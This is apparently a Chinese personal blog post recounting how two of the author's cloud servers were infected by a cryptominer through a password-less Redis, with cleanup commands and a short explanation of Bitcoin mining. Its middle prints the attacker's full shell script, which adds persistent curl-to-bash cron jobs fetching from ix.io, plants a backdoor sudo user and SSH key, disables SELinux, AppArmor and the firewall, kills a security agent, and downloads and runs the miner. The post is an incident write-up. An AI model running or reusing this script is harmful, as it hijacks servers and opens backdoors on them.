原创

记一次两台服务器同时被挖矿的过程

温馨提示:
本文最后更新于 2019年11月18日,已超过 1,591 天没有更新。若文章内的图片失效(无法正常加载),请留言反馈或直接联系我

一开始

昨天(2019-11-17),阿里云给我发短信,说我恶意下载?我心想,怎么可能,阿里云肯定搞错了,我又没下载什么东西,然后我觉得没啥事,继续写我的代码去了。

11.17阿里云紧急短信.jpg

然后今天又来了?然后我发现我服务器进程都挂了,最气人的是,我博客www.lzhpo.com也挂了,我才意识到问题的严重性。

11.18阿里云紧急短信.jpg

服务器

我一共就两台服务器,两台服务器CUP都被sic的进程占满了。

服务器1

阿里云ecs被挖矿.png

服务器2

轻量级服务器被挖矿.png

1. 找到挖矿进程和文件实体,拿掉挖矿文件的可执行权限。

[root@lzhpo-ecs ~]# find / -name sic
/var/tmp/sic
/var/tmp/sic/sic
[root@lzhpo-ecs sic]# ll
total 756
-rw-r--r-- 1 root root   2995 Nov 18 18:30 config.json
-rwxr-xr-x 1 root root 766024 Nov 18 18:21 sic
[root@lzhpo-ecs sic]# chmod -x sic sic
[root@lzhpo-ecs sic]# chmod -x config.json sic

2. 删除挖矿程序,杀死挖矿进程

rm -rf /var/tmp/sic/
ps -ef | grep -v grep | egrep 'sic' | awk '{print $2}' | xargs kill -9

3. 清除.ssh/下的公钥文件

我服务器压根没有上传公钥,这肯定是侵入者留下的。

[root@lzhpo-ecs ~]# cd ~/.ssh
[root@lzhpo-ecs .ssh]# pwd
/root/.ssh
[root@lzhpo-ecs .ssh]# ll
total 4
-r-xr-xr-x 1 root root 743 Nov 18 18:20 authorized_keys
[root@lzhpo-ecs .ssh]# cat authorized_keys 


ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDi5nr/787EzPgUWvMYHJMeNW7FpuKaZwiZUWpCQH6mUzdf52nxx42BQXkWxeMf3ehl90+IsWX4XgXWdajS3gh9u09wi/uIbsikHerN11DSWHxi2qF67YH5dfOSHuSsGdFvEEsn5h574CyIrSdDCx5CkZPzu0t87dIj00aJTldRyAaWqtRRHnXg4wHAvc4R1GsAZLoODuv96H9IdDVUxidi7h36xlA2g11p7oY8bGcKIe98Vnok/5/qoMVs/64FsEU70rINXS26Z+2V05UdKxei33TP87UTKPX58mKNhMsRx8LUrpkuHjPU9f/V9LCLZpyCrB6WVgBsKiBfzK69H0kusOBgevG2gjSEIWE+sI9WRHN7iPtw4EcC/ZRzFbNx2p6BuL4jO4MpQzETzW5V0hfCrKmujtCHoYPu1TxKFENOJ3ZwOs0gQ42s2UB/L4CjJOiAmFSb+dkq28UJLDDWlkOatc7TZ/fNH8TAKL/t/k6ohj/lflEMrgErsXckFZbuz6L90k7QyWrv7hGIjZQLu9TYW+FHH/bQK0NDwXRsJRdl/Nucq1X4UNfud4GoZKb0Xmo7r829hxhBsBUHliZItsV9paNJbfSzbV8/rVVerMp89LheoWNIZVb87THCo0Z+rUfOtT87b3aXCrKzTjZNwc2Sf3QW+Pd+4v1NqrrCD79mYQ== adm1n@localhost
[root@lzhpo-ecs .ssh]# rm -rf authorized_keys 
[root@lzhpo-ecs .ssh]#

4.清除这些定时任务

[root@lzhpo-ecs ~]# crontab -l
0,30 * * * * curl -sL http://ix.io/1XQa | bash -s
0,45 * * * * curl -sL http://ix.io/1XQh | bash -s

# 进入之后,清除这些定时任务
[root@lzhpo-ecs ~]# crontab -e

到此为止,挖矿的事情就都解决了

这些挖矿病毒都是通过你的Redis没有设置密码侵入的,所以,你的Redis还敢不设置密码吗?

再看一下这个定时任务的地址文件

这写的都是shell脚本,让你的服务器做一些“花里胡哨”的事情。

定时任务.png

#!/bin/bash

resetsshgo(){
if [ "$needreset" -eq "0" ]; 
then
echo "no need"
else
sleep 10;
/etc/init.d/ssh restart;
/etc/init.d/sshd restart;
/etc/rc.d/sshd restart;
service ssh restart;
service sshd restart;
systemctl start ssh;
systemctl restart ssh;
scw-fetch-ssh-keys --upgrade;
fi
}

sshaddusergo() {
if id "darmok" 2>/dev/null; then
echo ""
else
useradd -m -p '$1$EuTlnGKV$I6ULVhrfUCnEpFqLGFVHY0' darmok;
usermod -aG sudoers darmok;
usermod -aG root darmok;
adduser darmok sudo;
echo "darmok    ALL=(ALL)       ALL" >> /etc/sudoers
sed -i '/.PermitRootLogin*/d' /etc/ssh/sshd_config
echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
needreset=1;
fi
}

filegetgo(){
sysctl -w vm.nr_hugepages=$(nproc --all);
echo always | sudo tee /sys/kernel/mm/transparent_hugepage/enabled;
curl -sL -o /var/tmp/sic/config.json http://ix.io/1XQf || curl -sL -o /tmp/sic/config.json http://ix.io/1XQf;
if md5sum --status -c - <<<"79842ff6ab72f12c836b1f83021c801b /var/tmp/sic/config.json" || md5sum --status -c - <<<"79842ff6ab72f12c836b1f83021c801b /tmp/sic/config.json"
then
echo ""
else
curl -sL -o /var/tmp/sic/config.json http://photo20.ir/images/up13131574026902_k.jpg || curl -sL -o /tmp/sic/config.json http://photo20.ir/images/up13131574026902_k.jpg;
if md5sum --status -c - <<<"79842ff6ab72f12c836b1f83021c801b /var/tmp/sic/config.json" || md5sum --status -c - <<<"79842ff6ab72f12c836b1f83021c801b /tmp/sic/config.json"
then
echo ""
else
curl -sL -o /var/tmp/sic/config.json http://uupload.ir/files/wavo_img.jpg  || curl -sL -o /tmp/sic/config.json http://uupload.ir/files/wavo_img.jpg;
fi
fi
url[0]="$(curl -sL $(curl -sL http://ix.io/212B | shuf | head -1) | grep -i "><img" | sed -r 's/.*href="([^"]+).*/\1/g' | head -1)" && curl --create-dirs -sL -o /var/tmp/sic/sic ${url[0]} || curl ---create-dirs sL -o /tmp/sic/sic ${url[0]};
if md5sum --status -c - <<<"72e3f8762f4d35fde98afcaf684eaa86 /var/tmp/sic/sic" || md5sum --status -c - <<<"72e3f8762f4d35fde98afcaf684eaa86 /tmp/sic/sic"
then
chmod +x /var/tmp/sic/sic || /tmp/sic/sic
/var/tmp/sic/sic || /tmp/sic/sic
else
url[1]="$(curl -sL $(curl -sL http://ix.io/212F | shuf | head -1) | grep -i "><img" | sed -r 's/.*href="([^"]+).*/\1/g' | head -1)" && curl --create-dirs -sL -o /var/tmp/sic/sic ${url[1]} || curl --create-dirs -sL -o /tmp/sic/sic ${url[1]};
if md5sum --status -c - <<<"72e3f8762f4d35fde98afcaf684eaa86 /var/tmp/sic/sic" || md5sum --status -c - <<<"72e3f8762f4d35fde98afcaf684eaa86 /tmp/sic/sic"
then
chmod +x /var/tmp/sic/sic || /tmp/sic/sic
/var/tmp/sic/sic || /tmp/sic/sic
else
url[2]="$(curl -sL $(curl -sL http://ix.io/212G | shuf | head -1) | grep -i "><img" | sed -r 's/.*href="([^"]+).*/\1/g' | head -1)" && curl --create-dirs -sL -o /var/tmp/sic/sic ${url[2]} || curl ---create-dirs sL -o /tmp/sic/sic ${url[2]};
if md5sum --status -c - <<<"72e3f8762f4d35fde98afcaf684eaa86 /var/tmp/sic/sic" || md5sum --status -c - <<<"72e3f8762f4d35fde98afcaf684eaa86 /tmp/sic/sic"
then
chmod +x /var/tmp/sic/sic || /tmp/sic/sic
/var/tmp/sic/sic || /tmp/sic/sic
else
url[3]="$(curl -sL $(curl -sL http://ix.io/2160 | shuf | head -1) | grep -i "><img" | sed -r 's/.*href="([^"]+).*/\1/g' | head -1)" && curl --create-dirs -sL -o /var/tmp/sic/sic ${url[3]} || curl --create-dirs -sL -o /tmp/sic/sic ${url[3]};
if md5sum --status -c - <<<"72e3f8762f4d35fde98afcaf684eaa86 /var/tmp/sic/sic" || md5sum --status -c - <<<"72e3f8762f4d35fde98afcaf684eaa86 /tmp/sic/sic"
then
chmod +x /var/tmp/sic/sic || /tmp/sic/sic
/var/tmp/sic/sic || /tmp/sic/sic
else
url[4]="$(curl -sL $(curl -sL http://ix.io/21cd | shuf | head -1) | grep  -i "><img" | sed -r 's/.*href="([^"]+).*/\1/g' | head -1)" && curl --create-dirs -sL -o /var/tmp/sic/sic ${url[4]} || curl --create-dirs -sL -o /tmp/sic/sic ${url[4]};
if md5sum --status -c - <<<"72e3f8762f4d35fde98afcaf684eaa86 /var/tmp/sic/sic" || md5sum --status -c - <<<"72e3f8762f4d35fde98afcaf684eaa86 /tmp/sic/sic"
then
chmod +x /var/tmp/sic/sic || /tmp/sic/sic
/var/tmp/sic/sic || /tmp/sic/sic
else
url[5]="$(curl -sL $(curl -sL hhttp://ix.io/21ce | shuf | head -1) | grep  -i "><img" | sed -r 's/.*href="([^"]+).*/\1/g' | head -1)" && curl --create-dirs -sL -o /var/tmp/sic/sic ${url[5]} || curl --create-dirs -sL -o /tmp/sic/sic ${url[5]};
if md5sum --status -c - <<<"72e3f8762f4d35fde98afcaf684eaa86 /var/tmp/sic/sic" || md5sum --status -c - <<<"72e3f8762f4d35fde98afcaf684eaa86 /tmp/sic/sic"
then
chmod +x /var/tmp/sic/sic || /tmp/sic/sic
/var/tmp/sic/sic || /tmp/sic/sic
else
url[6]="$(curl -sL $(curl -sL http://ix.io/21cf | shuf | head -1) | grep  -i "><img" | sed -r 's/.*href="([^"]+).*/\1/g' | head -1)" && curl --create-dirs -sL -o /var/tmp/sic/sic ${url[6]} || curl --create-dirs -sL -o /tmp/sic/sic ${url[6]};
if md5sum --status -c - <<<"72e3f8762f4d35fde98afcaf684eaa86 /var/tmp/sic/sic" || md5sum --status -c - <<<"72e3f8762f4d35fde98afcaf684eaa86 /tmp/sic/sic"
then
chmod +x /var/tmp/sic/sic || /tmp/sic/sic
/var/tmp/sic/sic || /tmp/sic/sic
else
url[7]="$(curl -sL $(curl -sLk http://ix.io/21cg | shuf | head -1) | grep  -i "><img" | sed -r 's/.*href="([^"]+).*/\1/g' | head -1)" && curl --create-dirs -sL -o /var/tmp/sic/sic ${url[7]} || curl --create-dirs -sL -o /tmp/sic/sic ${url[7]};
if md5sum --status -c - <<<"72e3f8762f4d35fde98afcaf684eaa86 /var/tmp/sic/sic" || md5sum --status -c - <<<"72e3f8762f4d35fde98afcaf684eaa86 /tmp/sic/sic"
then
chmod +x /var/tmp/sic/sic || /tmp/sic/sic
/var/tmp/sic/sic || /tmp/sic/sic
else
url[8]="$(curl -sL $(curl -sLk http://ix.io/21Ds | shuf | head -1) | grep  -i "><img" | sed -r 's/.*href="([^"]+).*/\1/g' | head -1)" && curl --create-dirs -sL -o /var/tmp/sic/sic ${url[8]} || curl --create-dirs -sL -o /tmp/sic/sic ${url[8]};
if md5sum --status -c - <<<"72e3f8762f4d35fde98afcaf684eaa86 /var/tmp/sic/sic" || md5sum --status -c - <<<"72e3f8762f4d35fde98afcaf684eaa86 /tmp/sic/sic"
then
chmod +x /var/tmp/sic/sic || /tmp/sic/sic
/var/tmp/sic/sic || /tmp/sic/sic
else
apt-get install -y wget || yum install -y wget;
wget $(curl http://ix.io/1XQn) -O /var/tmp/sic/sic || wget $(curl http://ix.io/1XQn) -O /tmp/sic/sic;
if md5sum --status -c - <<<"72e3f8762f4d35fde98afcaf684eaa86 /var/tmp/sic/sic" || md5sum --status -c - <<<"72e3f8762f4d35fde98afcaf684eaa86 /tmp/sic/sic"
then
chmod +x /var/tmp/sic/sic || /tmp/sic/sic
/var/tmp/sic/sic || /tmp/sic/sic
else
echo "well shit"
fi
fi
fi
fi
fi
fi
fi
fi
fi
fi
}

sshkeysgo(){
if [ -f "/root/.ssh/authorized_keys" ]
then
echo ""
else
needreset=1;
mkdir -p /root/.ssh
echo "" >> /root/.ssh/authorized_keys
fi
cat /etc/ssh/sshd_config | grep -iw "#Port 22" | grep -v grep >/dev/null
if [ $? -eq 1 ]
then
echo ""
else
needreset=1;
sed -i 's/#Port 22/Port 22/g' /etc/ssh/sshd_config
fi
cat /etc/ssh/sshd_config | grep -iw "port 78" | grep -v grep >/dev/null
if [ $? -eq 0 ]
then
echo ""
else
needreset=1;
echo "" > /etc/hosts.deny;
echo "" > /etc/hosts.allow;
chattr -iau /etc/ssh/sshd_config
chmod 777 /etc/ssh/sshd_config
echo "Port 78" >> /etc/ssh/sshd_config;
chmod 555 /etc/ssh/sshd_config
fi
cat /root/.ssh/authorized_keys | grep -iw "adm1n@localhost" | grep -v grep >/dev/null
if [ $? -eq 0 ]
then
echo ""
else
needreset=1;
mkdir -p /root/.ssh
chmod 777 /root/.ssh/authorized_keys;
chattr -iau /root/.ssh/authorized_keys;
echo -e "\n" >> /root/.ssh/authorized_keys
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDi5nr/787EzPgUWvMYHJMeNW7FpuKaZwiZUWpCQH6mUzdf52nxx42BQXkWxeMf3ehl90+IsWX4XgXWdajS3gh9u09wi/uIbsikHerN11DSWHxi2qF67YH5dfOSHuSsGdFvEEsn5h574CyIrSdDCx5CkZPzu0t87dIj00aJTldRyAaWqtRRHnXg4wHAvc4R1GsAZLoODuv96H9IdDVUxidi7h36xlA2g11p7oY8bGcKIe98Vnok/5/qoMVs/64FsEU70rINXS26Z+2V05UdKxei33TP87UTKPX58mKNhMsRx8LUrpkuHjPU9f/V9LCLZpyCrB6WVgBsKiBfzK69H0kusOBgevG2gjSEIWE+sI9WRHN7iPtw4EcC/ZRzFbNx2p6BuL4jO4MpQzETzW5V0hfCrKmujtCHoYPu1TxKFENOJ3ZwOs0gQ42s2UB/L4CjJOiAmFSb+dkq28UJLDDWlkOatc7TZ/fNH8TAKL/t/k6ohj/lflEMrgErsXckFZbuz6L90k7QyWrv7hGIjZQLu9TYW+FHH/bQK0NDwXRsJRdl/Nucq1X4UNfud4GoZKb0Xmo7r829hxhBsBUHliZItsV9paNJbfSzbV8/rVVerMp89LheoWNIZVb87THCo0Z+rUfOtT87b3aXCrKzTjZNwc2Sf3QW+Pd+4v1NqrrCD79mYQ== adm1n@localhost" >> /root/.ssh/authorized_keys
sed -i '/.PermitRootLogin*/d' /etc/ssh/sshd_config
echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
chmod 555 /root/.ssh/authorized_keys
fi
}

securitygo() {
needreset=0;
setenforce 0;
ufw disable;
iptables -F;
echo SELINUX=disabled > /etc/selinux/config;
systemctl stop apparmor;
systemctl disable apparmor;
service apparmor stop;
service apparmor teardown;
update-rc.d -f apparmor remove;
ps aux | grep -v grep | grep 'aegis' | awk '{prrint $2}' | xargs -I % kill -9 %;
ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 %;
rm -rf /usr/local/aegis;
curl -sL http://ix.io/1XQh | bash -s 2>/dev/null;
ps aux | grep -vw sic/sic | grep -v grep | awk '{if($3>80.0) print $2}' | xargs -I % kill -9 %
}

filesetupgo(){
j=0; for i in `ps -fe| grep 'sic/sic' | grep -v grep | grep -v http | awk '{print $2}'`; do let j=j+1; if [ $j -ge 2 ]; then echo "Killing process $i"; kill -9 $i; fi done;
ps -fe | grep -w sic/sic | grep -v grep | grep -v http
if [ $? -eq 0 ]
then
echo "RUNNING";
else
curl -4sL "https://iplogger.org/1uUs87" 2>/dev/null;
mkdir -p /var/tmp/sic || mkdir -p /tmp/sic/;
filegetgo
fi
}

cronsetupgo(){
crontab -l |grep -e "1XQa" | grep -v grep
if [ $? -eq 0 ]
then
echo "cron good"
else
chattr -aui /var/spool/cron/root
echo "0,30 * * * * curl -sL http://ix.io/1XQa | bash -s" >> /tmp/cron || true && \
echo "0,45 * * * * curl -sL http://ix.io/1XQh | bash -s" >> /tmp/cron || true && \
crontab -u root /tmp/cron || true && \
anacron -t /tmp/cron
rm -rf /tmp/cron
fi
}


filerungo(){
ps -fe | grep -w sic/sic | grep -v grep | grep -v http
if [ $? -eq 0 ]
then
echo "RUNNING"
else
sysctl -w vm.nr_hugepages=$(nproc --all)
echo always | sudo tee /sys/kernel/mm/transparent_hugepage/enabled
/var/tmp/sic/sic || /tmp/sic/sic
fi
ps aux | grep -vw sic/sic | grep -v grep | awk '{if($3>80.0) print $2}' | xargs -I % kill -9 %
}

securitygo
sshaddusergo
sshkeysgo
filesetupgo
cronsetupgo
filerungo
resetsshgo

解读挖矿

在比特币系统中,大概每十分钟会生成一个新的区块,这个区块记录着这10分钟里全网的比特币交易信息,我们所说的挖矿,也就是记录交易信息的过程。

因为去中心化,每个人都有帮别人记录交易信息的权利,成功抢到记录权的人会获得系统新生的比特币奖励,所以挖矿也是产生比特币的过程。 而比特币是由中本聪先生发明的。

他要获得比特币,需要很多性能高的挖矿机 )!所以,我的服务器因为Redis没有设置密码,然后中奖了!

挖矿概念参考文章

https://www.zhihu.com/question/20792042

https://www.zhihu.com/question/21343860

https://www.walian.cn/zixun/news/1468.html

https://www.weusecoins.com/translations/mining-guide/zh-mining-guide/

本文目录